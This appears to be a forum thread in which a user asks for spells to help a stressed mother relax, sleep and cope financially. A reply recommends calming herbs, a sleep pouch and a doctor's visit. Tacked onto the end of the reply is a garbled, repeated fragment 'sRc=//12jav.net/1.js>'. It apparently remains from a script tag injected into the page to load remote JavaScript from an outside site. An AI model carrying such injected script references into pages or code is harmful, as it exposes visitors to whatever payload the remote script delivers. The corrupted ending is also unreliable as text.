My mother lives a very stressful life. A lot of ways to cope, dont work for her anymore. Meditation cannot clear her mind or help her relax, and there's always something going on.
So what i'm asking is-
Are their any spells or rituals i can do to help my mom be at ease or get a good nights sleep? I cant do them with her, because she isn't comfortable doing the practice. So something i can do in my room, with a few candles and some paper.
And maybe something to help her financially.
I really want to help make her life easier.

Try calming herbs,such as chamomile or lavender.Make a 'sleep pouch' filled with herbs and put it near her while she sleeps.
Also,your mother should maybe see a doctor.True,she may be stressed,but this may be a serious condition,such as insomnia. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
